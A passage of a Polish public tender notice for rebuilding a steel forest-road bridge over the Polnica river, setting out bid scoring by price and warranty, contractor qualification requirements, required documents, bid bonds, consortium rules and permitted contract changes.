uporządkowania (m. in. prace ziemne, utylizacja materiału) po częściowej rozbiórce obiektu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45220000-5 - Roboty inżynieryjne i budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">56 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert w każdym Zadaniu Zamawiający będzie się kierował następującymi kryteriami oceny ofert, którym przypisano wagę jak poniżej:<br/>1) Cena – 60 %,<br/>2) Okres gwarancji: - 40 %<br/>Za najkorzystniejszą ofertę w danym Pakiecie uznana zostanie Oferta wykonawcy, która uzyska największą liczbę punktów.<br/>P = C + G gdzie:<br/>P - łączna liczba punktów, jaką uzyskała oceniana oferta<br/>C - liczba punktów przyznanych ocenianej ofercie w ramach kryterium Cena<br/>G - liczba punktów przyznanych ocenianej ofercie w kryterium Okres gwarancji.<br/>Zamawiający obliczy punkty, z dokładnością do dwóch miejsc po przecinku, zaokrąglając zgodnie z zasadami matematycznymi. Oferta może uzyskać maksymalnie 100 pkt.<br/>Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>Ocena ofert zostanie dokonana oddzielnie dla każdego Zadania.<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu ofertowym dla danego Zadania (załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>W ramach kryterium „Okres gwarancji" będzie rozpatrywane na podstawie zobowiązania zawartego w pkt 2 formularza ofertowego (Załącznik nr 1 do SWZ):<br/>a) za przyjęcie na siebie zobowiązania udzielenia gwarancji na okres 24 miesięcy wykonawca otrzyma 20 pkt,<br/>b) za przyjęcie na siebie zobowiązania udzielenia gwarancji na okres 36 miesięcy wykonawca otrzyma 30 pkt,<br/>c) za przyjęcie na siebie zobowiązania udzielenia gwarancji na okres 48 miesięcy wykonawca otrzyma 40 pkt,<br/>W przypadku nie zaznaczenia w formularzu ofertowym w pkt. 2 stosownej rubryki, tj. żadnej z opcji wyboru wykonawca otrzyma 20 pkt, a Zamawiający przyjmie, że wykonawca oferuje minimalny okres gwarancji tj. 24 miesiące.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji (24 mies. - 20 pkt, 36 mies. - 30 pkt, 48 mies. - 40 pkt)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 4 - przebudowa mostu stalowego w ciągu drogi leśnej nr 54 nad rzeką Polnicą (działka 190, 210, 289 – obręb Sieciemin; gmina Sianów)<br/>I. Wykonanie nowego posadowienia i podpór obiektu;<br/>II. Odnowienie antykorozyjnych powłok malarskich istniejącego przęsła stalowego (dźwigar SMT-1) oraz stalowych poręczy;<br/>III. Uzupełnienie ewentualnych ubytków przęsła, w tym elementów konstrukcji stalowej oraz drewnianego wypełniania pomostu;<br/>IV. Wykonanie strefy przejściowej na dojazdach do obiektu;<br/>V. Umocnienie faszynowe (lub gabionowe) w obrębie brzegów;<br/>Podczas przewidywanych prac występować będzie etap rozbiórki wybranych elementów konstrukcji pomostu i podpór oraz elementów wyposażenia obejmujące:<br/>- usunięcie podpór konstrukcji wraz z pracami porządkowymi po częściowej rozbiórce konstrukcji.<br/>W ramach prowadzonych prac nie przewiduje się przebudowy przęsła stalowego – dźwigar SMT-1 Nie zakłada się podwyższenia nośności istniejącego przęsła stalowego. Zakłada się, że nośność nowego posadowienia i podpór powinna być nie mniejsza niż: jak dla klasy obciążenia C wg PN-85-S-10030 lub równoważne – „Obiekty mostowe – obciążenia”.<br/>Zdemontowane przęsło jest złożone na legarach na terenie placu budowy - w odległości nie większej niż 50 m od koryta rzeki. Podpory drewniane zostały rozebrane w części. Teren wymaga uporządkowania (m. in. prace ziemne, utylizacja materiału) po częściowej rozbiórce obiektu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45220000-5 - Roboty inżynieryjne i budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">56 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert w każdym Zadaniu Zamawiający będzie się kierował następującymi kryteriami oceny ofert, którym przypisano wagę jak poniżej:<br/>1) Cena – 60 %,<br/>2) Okres gwarancji: - 40 %<br/>Za najkorzystniejszą ofertę w danym Pakiecie uznana zostanie Oferta wykonawcy, która uzyska największą liczbę punktów.<br/>P = C + G gdzie:<br/>P - łączna liczba punktów, jaką uzyskała oceniana oferta<br/>C - liczba punktów przyznanych ocenianej ofercie w ramach kryterium Cena<br/>G - liczba punktów przyznanych ocenianej ofercie w kryterium Okres gwarancji.<br/>Zamawiający obliczy punkty, z dokładnością do dwóch miejsc po przecinku, zaokrąglając zgodnie z zasadami matematycznymi. Oferta może uzyskać maksymalnie 100 pkt.<br/>Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>Ocena ofert zostanie dokonana oddzielnie dla każdego Zadania.<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu ofertowym dla danego Zadania (załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>W ramach kryterium „Okres gwarancji" będzie rozpatrywane na podstawie zobowiązania zawartego w pkt 2 formularza ofertowego (Załącznik nr 1 do SWZ):<br/>a) za przyjęcie na siebie zobowiązania udzielenia gwarancji na okres 24 miesięcy wykonawca otrzyma 20 pkt,<br/>b) za przyjęcie na siebie zobowiązania udzielenia gwarancji na okres 36 miesięcy wykonawca otrzyma 30 pkt,<br/>c) za przyjęcie na siebie zobowiązania udzielenia gwarancji na okres 48 miesięcy wykonawca otrzyma 40 pkt,<br/>W przypadku nie zaznaczenia w formularzu ofertowym w pkt. 2 stosownej rubryki, tj. żadnej z opcji wyboru wykonawca otrzyma 20 pkt, a Zamawiający przyjmie, że wykonawca oferuje minimalny okres gwarancji tj. 24 miesiące.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji (24 mies. - 20 pkt, 36 mies. - 30 pkt, 48 mies. - 40 pkt)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Warunek sytuacji finansowej – dotyczy wszystkich zadań i jest taki sam dla każdego zadania<br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, że posiada środki finansowe lub<br/>zdolność kredytową o wartości nie mniejszej niż 30 000,00 zł (słownie: trzydzieści tysięcy złotych<br/>00/100) na każde zadanie. Jeżeli Wykonawca składa ofertę na kilka lub wszystkie zadania, ww.<br/>wymagana wartość ulega proporcjonalnemu zwiększeniu (tj. złożono ofertę na: dwa zadania –<br/>wartość środków finansowych lub zdolności kredytowej nie mniejsza niż 60 000,00 zł; trzy<br/>zadania 90 000,00 zł; cztery zadania 120 000,00 zł).<br/>2) Warunek zdolności technicznej lub zawodowej – dotyczy wszystkich zadań i jest taki sam dla<br/>każdego zadania<br/>a) Warunek ten w zakresie doświadczenia zostanie uznany za spełniony, jeżeli Wykonawca<br/>wykaże, że w okresie ostatnich 5 lat liczonych wstecz od dnia, w którym upływa termin składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1<br/>robotę budowlaną polegającą na budowie lub przebudowie lub rozbudowie lub remoncie mostu<br/>lub wiaduktu lub estakady lub przepustu - o wartości minimum 80 000,00 zł brutto (słownie:<br/>osiemdziesiąt tysięcy złotych 00/100) na każde zadanie. Jeżeli Wykonawca składa ofertę na<br/>kilka lub wszystkie zadania, ww. wymagana wartość ulega proporcjonalnemu zwiększeniu (tj.<br/>złożono ofertę na: dwa zadania – wartość doświadczenia min. 160 000,00 zł; trzy zadania 240<br/>000,00 zł; cztery zadania 320 000,00 zł). Przez jedną robotę budowlaną rozumie się roboty<br/>wykonane na podstawie jednej umowy.<br/>b) Warunek ten w zakresie osób skierowanych do realizacji zamówienia zostanie uznany za<br/>spełniony, jeżeli Wykonawcy wykaże, że dysponuje lub będzie dysponował niżej wymienionymi<br/>osobami:<br/>o 1 osobą do pełnienia funkcji kierownika budowy posiadającą uprawnienia do kierowania<br/>robotami budowlanymi w specjalności inżynieryjnej mostowej bez ograniczeń oraz posiadającą<br/>co najmniej<br/>3-letnie doświadczenie zawodowe zdobyte po uzyskaniu stosownych uprawnień budowlanych w<br/>pełnieniu funkcji kierownika budowy, kierownika robót lub inspektora nadzoru przy robotach<br/>polegających na budowie, przebudowie, rozbudowie lub remoncie mostu lub wiaduktu lub<br/>estakady lub przepustu. Nakładające się na siebie okresy sprawowania opisanych wyżej funkcji<br/>nie sumują się. Dopuszcza się pełnienie funkcji kierownika budowy przez jedną osobę dla<br/>wszystkich zadań.<br/>Osoby przewidziane do pełnienia samodzielnych funkcji technicznych w budownictwie muszą<br/>posiadać wymagane uprawnienia, które zostały wydane zgodnie z ustawą z dnia 7 lipca 1994 r.<br/>Prawo budowlane (tekst jedn.: Dz. U. z 2020 r. poz. 1333). Zamawiający określając wymogi dla<br/>osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów zgodnie z art. 104 ustawy Prawo budowlane w myśl którego osoby, które przed dniem<br/>wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania<br/>przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie,<br/>zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zamawiający<br/>dopuszcza także odpowiadające im uprawnienia wydane obywatelom państw członkowskich<br/>Unii Europejskiej, w zakresie którego właściwy organ wydaje decyzję w sprawie uznania<br/>kwalifikacji zawodowych na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o<br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (t. j. Dz. U. z 2020 r. poz. 220). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) PZP, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę<br/>lub ofertę częściową, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej<br/>b) informację z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1 pkt 1 i 2 PZP, (b) art. 108 ust.<br/>1 pkt 4 PZP, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>karnego - sporządzoną nie wcześniej niż 6 miesięcy przed jej złożeniem,<br/>c) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawione nie wcześniej<br/>niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków i opłat wraz z<br/>zaświadczeniem dokumenty potwierdzające, że przed upływem terminu składania ofert Wykonawca<br/>dokonał płatności należnych podatków wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności,<br/>d) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy,<br/>wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem<br/>terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności,<br/>e) odpis lub informacje z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat*, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały<br/>wykonane<br/>*5-letni okres jest liczony wstecz od dnia, w którym upływa termin składania ofert<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych<br/>wspólnie z innymi wykonawcami, wykaz dotyczy robót budowlanych, w których wykonaniu wykonawca<br/>ten bezpośrednio uczestniczył.<br/>b) Dowody określające czy te roboty budowlane zostały wykonane należycie<br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot,<br/>na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od<br/>niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>c) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość<br/>posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed jej złożeniem.<br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez zamawiającego<br/>podmiotowych środków dowodowych, o których mowa w lit. c), Wykonawca składa inne podmiotowe<br/>środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez<br/>Zamawiającego warunku udziału w postępowaniu.<br/>d) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień i doświadczenia, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od wykonawców złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a)kopię umowy regulującej współpracę wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. umowę konsorcjum), jeżeli zamówienie będzie realizowane przez wykonawców wspólnie ubiegających się o udzielenie zamówienia udostępnionej pod rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym,<br/>b) dokumenty potwierdzające warunek posiadanych uprawnień kierownika budowy,<br/>c) polisę od odpowiedzialności cywilnej określoną we wzorze umowy w sprawie zamówienia publicznego (załącznik nr 8 do SWZ) w wysokości 50 000,00 zł dla każdego zadania. Jeżeli Wykonawca składa ofertę na kilka lub wszystkie zadania, ww. wymagana wartość ulega proporcjonalnemu zwiększeniu (tj. złożono ofertę na: dwa zadania – wartość polisy od odpowiedzialności cywilnej nie mniejsza niż 100 000,00 zł; trzy zadania 150 000,00 zł; cztery zadania 200 000,00 zł).<br/>d) dokument potwierdzający uprawnienie do reprezentowania Wykonawcy, w tym ich umocowanie do podpisania umowy, o ile umocowanie to nie wynika z dokumentów dołączonych do oferty <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> dla Zadania 1 w wysokości 2 000,00 zł<br/>dla Zadania 2 w wysokości 2 000,00zł<br/>dla Zadania 3 w wysokości 2 000,00zł<br/>dla Zadania 4 w wysokości 2 000,00zł <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu określone w pkt 7.1. SWZ powinni spełniać łącznie wszyscy Wykonawcy.<br/>W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) oświadczenie, o którym mowa w art. 125 ust. 1 PZP składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Ww. oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia powinno zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 9.3. obowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>5) dokumenty, o których mowa w pkt 9.2. lit. a) i d) wykonawcy wspólnie ubiegający się o zamówienie składają wspólnie, natomiast dokumenty, o których mowa w pkt 9.2. lit. b) i c) składa ten z wykonawców wspólnie ubiegających się o udzielenie zamówienia, który wykazuje spełnienie warunku udziału w postępowaniu, do którego wykazania służy dany dokument;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>8) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>W związku z powyższym Wykonawca jest zobowiązany załączyć do oferty podmiotowy środek dowodowy w postaci oświadczenia, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy. Wzór stosownego oświadczenia został zawarty w formularzu ofertowym (stanowiącym załącznik nr 1 do SWZ) i Zamawiający zaleca złożyć to oświadczenie właśnie w tym formularzu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Strony dopuszczają możliwość zmiany Umowy w zakresie terminu realizacji Umowy, w następujących przypadkach:<br/>1.1. wystąpienia niemożliwych do przewidzenia niekorzystnych warunków atmosferycznych, uniemożliwiających prowadzenie prac, w których niemożliwe jest prowadzenie robót bezpiecznie pod względem BHP, w sposób prawidłowy, zgodny z umówioną technologią lub zasadami sztuki budowlanej. Przez niekorzystne warunki atmosferyczne rozumie się nadzwyczajne zjawiska pogodowe takie jak: nawałnice, ulewne deszcze, bardzo silne wiatry - uniemożliwiające prowadzenie zewnętrznych robót budowlanych w ogóle bądź bez niewspółmiernych nakładów utrzymujące się dłużej niż 3 dni; 1.2. opóźnienia innych inwestycji lub robót bud. prowadzonych przez Zamawiającego lub innych zamawiających, które to inwestycje lub roboty kolidują z wykonaniem robót objętych Umową, co uniemożliwia Wykonawcy terminowe wykonanie Umowy;<br/>1.3. opóźnienia Zamawiającego w wykonaniu jego zobowiązań wynikających z Umowy lub przepisów powszechnie obowiązującego prawa, co uniemożliwia terminowe wykonanie Umowy przez Wykonawcę;<br/>1.4. opóźnienia organów administracji publicznej w wydaniu decyzji administracyjnych, uzgodnień lub innych aktów administracyjnych, których wydanie jest niezbędne dla dalszego wykonywania robót przez Wykonawcę, a opóźnienie organów nie wynika z przyczyn leżących po stronie Wykonawcy;<br/>1.5. opóźnienia w uzyskaniu wymaganych uzgodnień, opinii, aprobat od podmiotów trzecich, które to opóźnienie powstało z przyczyn nieleżących po stronie Wykonawcy, a powoduje brak możliwości wykonywania robót, co ma wpływ na termin wykonania Umowy;<br/>1.6. wstrzymania wykonania Umowy przez Zamawiającego z przyczyn nieleżących po stronie Wykonawcy, o ile takie działanie powoduje, że nie jest możliwe wykonanie Umowy w dotychczas ustalonym terminie;<br/>1.7. wystąpienia na Terenie bud. niewybuchów, niewypałów lub znalezisk archeologicznych, które wymagały wstrzymania wykonania robót bud. przez Wykonawcę;<br/>1.8. wystąpienia awarii na Terenie budowy, za którą odpowiedzialności nie ponosi Wykonawca, skutkującej koniecznością wstrzymania wykonania robót bud. przez Wykonawcę;<br/>1.9. wystąpienia niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektów w stosunku do danych wynikających z Dokumentacji projektowej przekazanej przez Zamawiającego, co spowodowało wstrzymanie wykonania robót bud., zmianę Dok. projektowej lub wykonanie robót dod. lub zamiennych;<br/>1.10. wystąpienia okoliczności uprawniających do zmiany Przedmiotu Umowy, o których mowa poniżej w ust. 3-5, jeżeli okoliczności te mają wpływ na termin wykonania Umowy;<br/>1.11. wystąpienia warunków siły wyższej, które uniemożliwiły wykonanie Umowy w dotychczas ustalonym terminie. Przez Siłę wyższą należy rozumieć zdarzenia i okoliczności, na które Strony nie mają wpływu i przed którymi nie mogły się zabezpieczyć, w tym w szczególności pożaru, zalania, wojny, zamieszek, epidemii, pandemii i innych klęsk żywiołowych;<br/>1.12. dopuszcza się zmianę terminu realizacji Przedmiotu Umowy w przypadku przedłużającej się procedury udzielenia zamówienia publicznego o czas niezbędny do wykonania robót stanowiących przedmiot Umowy,<br/>- przy czym każda zmiana terminu wykonania Przedmiotu Umowy może nastąpić tylko o czas<br/>niezbędny do wykonania robót stanowiących Przedmiot Umowy, nie dłużej jednak niż o okres trwania okoliczności będących podstawą zmiany oraz ich następstw.<br/>2. Dopuszczalna jest zmiana wysokości Wynagrodzenia Wykonawcy w przypadku:<br/>2.1. konieczności wykonania robót dodatkowych, zamiennych lub innych nieprzewidzianych w Dokumentacji projektowej, a których wykonanie jest konieczne albo w przypadku ograniczenia zakresu robót przewidzianych w Umowie;<br/>2.2. zmiany technologii wykonania robót lub Materiałów zastosowanych do ich realizacji;<br/>2.3. spełnienia się innych okoliczności uprawniających do zmiany Umowy, o których mowa w niniejszym paragrafie Umowy, jeżeli mają one wpływ na wysokość 